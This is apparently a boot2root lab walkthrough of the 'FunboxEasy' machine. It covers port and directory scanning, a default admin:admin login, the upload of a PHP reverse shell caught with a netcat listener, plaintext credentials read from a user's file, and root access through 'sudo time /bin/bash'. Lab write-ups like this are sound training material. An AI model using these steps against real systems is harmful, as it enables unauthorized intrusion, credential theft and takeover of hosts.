Target:  192.168.169.111

nmap -sV -sC -p- 192.168.169.111 --open -oN FunboxEasy.scan

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 21:42 GMT

Nmap scan report for 192.168.169.111

Host is up (0.069s latency).

Not shown: 64870 closed tcp ports (conn-refused), 663 filtered tcp ports (no-response)

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 b2d8516ec584051908ebc8582713132f (RSA)

|   256 b0de9703a72ff4e2ab4a9cd9439b8a48 (ECDSA)

|_  256 9d0f9a26384f0180a7a6809dd1d4cfec (ED25519)

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-title: Apache2 Ubuntu Default Page: It works

|_http-server-header: Apache/2.4.41 (Ubuntu)

| http-robots.txt: 1 disallowed entry

|_gym

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Now since a apache webserver is open I'll run gobuster against it

gobuster dir -u http://192.168.169.111:80 -w /usr/share/wordlists/dirb/common.txt                     21:44:44

===

Gobuster v3.5

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===

[+] Url:                     http://192.168.169.111:80

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                /usr/share/wordlists/dirb/common.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.5

[+] Timeout:                 10s

===

2023/06/11 21:44:45 Starting gobuster in directory enumeration mode

===

/.htpasswd            (Status: 403) [Size: 280]

/.hta                 (Status: 403) [Size: 280]

/admin                (Status: 301) [Size: 318] [--> http://192.168.169.111/admin/]

/.htaccess            (Status: 403) [Size: 280]

/index.html           (Status: 200) [Size: 10918]

/index.php            (Status: 200) [Size: 3468]

/robots.txt           (Status: 200) [Size: 14]

/secret               (Status: 301) [Size: 319] [--> http://192.168.169.111/secret/]

/server-status        (Status: 403) [Size: 280]

/store                (Status: 301) [Size: 318] [--> http://192.168.169.111/store/]

Progress: 4587 / 4615 (99.39%)

===

2023/06/11 21:45:22 Finished

went to /store and saw the admin login at the bottom.

Used default creds admin:admin and I got in

There is a new book editor where I can add new books.

https://i.imgur.com/wlc1q17.png

Attempt to upload a reverse shell in php format since the admin_add page is in php format

my rev shell in php

and to run a nc listener

nc -nlvp 4444

now to run the shell

Another image is at a url of

http://192.168.169.111/store/bootstrap/img/c_sharp_6.jpg

so I'll replace it with my image

And I''m in

nc -nlvp 4444                                                                                                                       21:51:14

listening on [any] 4444 ...

connect to [192.168.45.201] from (UNKNOWN) [192.168.169.111] 47264

bash: cannot set terminal process group (842): Inappropriate ioctl for device

bash: no job control in this shell

www-data@funbox3:/var/www/html/store/bootstrap/img$ ls

ls

android_studio.jpg

beauty_js.jpg

c_14_quick.jpg

c_sharp_6.jpg

doing_good.jpg

img1.jpg

img2.jpg

img3.jpg

kotlin_250x250.png

logic_program.jpg

mobile_app.jpg

pro_asp4.jpg

pro_js.jpg

revshell.php

unnamed.png

web_app_dev.jpg

cd home/

www-data@funbox3:/home$ ls

ls

tony

www-data@funbox3:/home$ cd tony

cd tony

www-data@funbox3:/home/tony$ ls

ls

password.txt

www-data@funbox3:/home/tony$ cat pas

cat password.txt

ssh: yxcvbnmYYY

gym/admin: asdfghjklXXX

/store: [email protected] admin

explored for tony's info and found his ssh info

Got  into Tony's account

ssh [email protected]                                                                                                                                                                                                       21:56:37

The authenticity of host '192.168.169.111 (192.168.169.111)' can't be established.

ED25519 key fingerprint is SHA256:sMY2EwBNywi3V/cmpdMCtvcC6NM31k0H9CTRlsxALfY.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '192.168.169.111' (ED25519) to the list of known hosts.

[email protected]'s password:

Permission denied, please try again.

[email protected]'s password:

Permission denied, please try again.

[email protected]'s password:

Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

System information as of Sun Jun 11 21:58:14 UTC 2023

System load:  0.88              Processes:               156

Usage of /:   76.7% of 4.66GB   Users logged in:         0

Memory usage: 58%               IPv4 address for ens256: 192.168.169.111

Swap usage:   0%

60 updates can be installed immediately.

0 of these updates are security updates.

To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To run a command as administrator (user "root"), use "sudo ".

See "man sudo_root" for details.

tony@funbox3:~$

now to check for sudo privileged  lists

tony@funbox3:/$ sudo -l

Matching Defaults entries for tony on funbox3:

env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User tony may run the following commands on funbox3:

(root) NOPASSWD: /usr/bin/yelp

(root) NOPASSWD: /usr/bin/dmf

(root) NOPASSWD: /usr/bin/whois

(root) NOPASSWD: /usr/bin/rlogin

(root) NOPASSWD: /usr/bin/pkexec

(root) NOPASSWD: /usr/bin/mtr

(root) NOPASSWD: /usr/bin/finger

(root) NOPASSWD: /usr/bin/time

(root) NOPASSWD: /usr/bin/cancel

(root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh

I can escalate through the time command

tony@funbox3:/$ sudo time /bin/bash

root@funbox3:/# cd

root@funbox3:~# ls

proof.txt  root.flag  snap

root@funbox3:~# cat root.flag

Your flag is in another file...

root@funbox3:~# cat proof.txt

50e46a8fbd4f1793c405c4e99729065a

root@funbox3:~# whoami

root

I had to go back and look for the now root flag which was here

root@funbox3:/# cd var/www/

root@funbox3:/var/www# ls

html  local.txt

root@funbox3:/var/www# cat local.txt

9a865fd61ade324bb6f8ef8831d5964b

boot2root